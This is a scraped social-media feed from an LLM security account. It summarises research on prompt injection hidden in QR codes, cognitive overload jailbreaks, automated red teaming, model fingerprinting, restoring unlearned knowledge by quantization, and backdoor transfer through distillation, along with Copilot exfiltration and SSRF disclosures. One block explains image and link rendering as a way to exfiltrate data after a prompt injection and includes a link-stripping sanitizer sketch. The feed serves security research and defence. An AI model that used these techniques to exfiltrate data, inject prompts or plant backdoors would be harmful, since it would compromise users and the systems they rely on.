LLM Security

@llm_sec

Followers: 10K
Following: 650
Media: 252
Statuses: 825

Research, papers, jobs, and news on large language model security. Got something relevant? DM / tag @llm_sec

🏔️
Joined April 2023
@llm_sec
LLM Security
1 year
@elder_plinius attack surface ∝ capabilities.
0
1
15
@llm_sec
LLM Security
3 months
RT @LeonDerczynski: Call for papers: LLMSEC 2025. Deadline 15 April, held w/ ACL 2025 in Vienna. Formats: long/short/war stories. More: >>….
0
4
0
@llm_sec
LLM Security
8 months
Gritty Pixy. "We leverage the sensitivity of existing QR code readers and stretch them to their detection limit. This is not difficult to craft very elaborated prompts and to inject them into QR codes. What is difficult is to make them inconspicuous as we do here with Gritty
1
3
27
@llm_sec
LLM Security
8 months
RT @garak_llm: garak has moved to NVIDIA! New repo link:
0
39
0
@llm_sec
LLM Security
8 months
ChatTL;DR – You Really Ought to Check What the LLM Said on Your Behalf 🌶️. "assuming that in the near term it’s just not machines talking to machines all the way down, how do we get people to check the output of LLMs before they copy and paste it to friends, colleagues, course
0
1
11
@llm_sec
LLM Security
8 months
Automated Red Teaming with GOAT: the Generative Offensive Agent Tester. "we introduce the Generative Offensive Agent Tester (GOAT), an automated agentic red teaming system that simulates plain language adversarial conversations while leveraging multiple adversarial prompting.
0
4
35
@llm_sec
LLM Security
8 months
LLMmap: Fingerprinting For Large Language Models. "With as few as 8 interactions, LLMmap can accurately identify 42 different LLM versions with over 95% accuracy. More importantly, LLMmap is designed to be robust across different application layers, allowing it to identify LLM
0
26
95
@llm_sec
LLM Security
8 months
author thread for cognitive overload attack:
@upadhayay_bibek
Bibek
9 months
1. 🔍 What do humans and LLMs have in common? They both struggle with cognitive overload! 🤯 In our latest study, we dive deep into In-Context Learning (ICL) and uncover surprising parallels between human cognition and LLM behavior. @aminkarbasi @vbehzadan 2. 🧠 Cognitive Load
0
0
3
@llm_sec
LLM Security
8 months
Cognitive Overload Attack: Prompt Injection for Long Context. "We applied the principles of Cognitive Load Theory in LLMs. We show that advanced models such as GPT-4, Claude-3.5 Sonnet, Claude-3 OPUS, Llama-3-70B-Instruct, Gemini-1.0-Pro, and Gemini-1.5-Pro can be successfully
1
9
35
@llm_sec
LLM Security
8 months
InjecGuard: Benchmarking and Mitigating Over-defense in Prompt Injection Guardrail Models. (-- look at that perf/latency Pareto frontier. game on!) "State-of-the-art models suffer from over-defense issues, with accuracy dropping close to random guessing levels (60%). We propose
2
5
35
@llm_sec
LLM Security
8 months
AgentHarm: A Benchmark for Measuring Harmfulness of LLM Agents. "To facilitate research on LLM agent misuse, we propose a new benchmark called AgentHarm. We find (1) leading LLMs are surprisingly compliant with malicious agent requests without jailbreaking, (2) simple universal
4
26
82
@llm_sec
LLM Security
8 months
Does your LLM truly unlearn? An embarrassingly simple approach to recover unlearned knowledge. "This paper reveals that applying quantization to models that have undergone unlearning can restore the "forgotten" information." "for unlearning methods with utility constraints, the
3
36
169
@llm_sec
LLM Security
8 months
RT @NannaInie: unpopular opinion: maybe let insecure be insecure and worry about the downstream effects on end users instead of protecting….
0
2
0
@llm_sec
LLM Security
8 months
RT @_Sizhe_Chen_: Safety comes first to deploying LLMs in applications like agents. For richer opportunities of LLMs, we mitigate prompt in….
0
13
0
@llm_sec
LLM Security
8 months
Insights and Current Gaps in Open-Source LLM Vulnerability Scanners: A Comparative Analysis 🌶️. "Our study evaluates prominent scanners - Garak, Giskard, PyRIT, and CyberSecEval - that adapt red-teaming practices to expose these vulnerabilities. We detail the distinctive features
1
11
51
@llm_sec
LLM Security
10 months
RT @mbrg0: the go-to method for data exfil after a successful prompt injection is rendering an image or a clickable link. that's why m365 c….
0
27
0
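Note on the exfil channel described in the retweet above: a rendered image or link can carry data out because the client fetches (or the user clicks) a URL whose query string holds the stolen text. One common mitigation idea is to drop images and links that point at untrusted hosts before rendering model output. The snippet below is a minimal sketch of that idea only, not any vendor's actual fix. The allowlist, the function name `strip_untrusted_links`, and the example URLs are all hypothetical, and the regex covers only simple inline Markdown links and images.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist; a real deployment would choose its own trusted hosts.
ALLOWED_HOSTS = {"example.com"}

# Matches simple inline Markdown images ![alt](url) and links [text](url).
MD_LINK = re.compile(r"(!?)\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def strip_untrusted_links(markdown: str) -> str:
    """Replace images and links to non-allowlisted hosts with their plain text."""

    def replace(match: re.Match) -> str:
        host = urlparse(match.group(3)).hostname or ""
        if host in ALLOWED_HOSTS:
            return match.group(0)  # trusted host: leave the Markdown untouched
        return match.group(2)  # untrusted: keep alt/link text, drop the URL

    return MD_LINK.sub(replace, markdown)


# Illustrative model output where an injected instruction smuggles data in a URL.
output = (
    "Summary done. ![status](https://attacker.invalid/p.png?d=SECRET) "
    "See [docs](https://example.com/help)."
)
cleaned = strip_untrusted_links(output)
print(cleaned)
```

The untrusted image is reduced to its alt text, so no request to the attacker-controlled host is triggered on render, while the allowlisted link is kept as written. Reference-style links, raw HTML, and bare URLs are out of scope for this sketch.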
@llm_sec
LLM Security
11 months
RT @wunderwuzzi23: 🔥 Microsoft fixed a high severity data exfiltration exploit chain in Copilot that I reported earlier this year. It was….
0
74
0
@llm_sec
LLM Security
11 months
Tenable Research discovered a vulnerability in Microsoft’s Copilot Studio via a server-side request forgery (SSRF), which allowed access to potentially sensitive information regarding service internals with potential cross-tenant impact.
0
0
11
@llm_sec
LLM Security
11 months
Transferring Backdoors between Large Language Models by Knowledge Distillation. "we propose ATBA, an adaptive transferable backdoor attack, which can effectively distill the backdoor of teacher LLMs into small models when only executing clean-tuning". "we exploit a shadow model
1
4
30